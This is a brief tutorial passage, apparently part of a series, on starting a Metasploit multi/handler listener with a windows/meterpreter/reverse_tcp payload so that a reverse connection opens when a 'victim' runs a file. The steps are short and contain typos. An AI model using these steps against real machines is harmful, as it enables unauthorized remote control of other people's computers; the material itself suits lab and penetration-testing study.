In the previous tutorial we learnt how to use a payload pre-loaded in kali linux using msfvenom. In this part of the tutorial we shall see how to create a listener.
Steps
- Open terminal and type msfconsole
- Type use exploit/multi/handler

3. Nowset payload using set playload windows/meterpreter/reverse_tcp

4. Nowset lhost and lport

5. Type exploit to start listening

6. Now when the victim open the file it created reverse connection

We can see that a reverse connection has been done.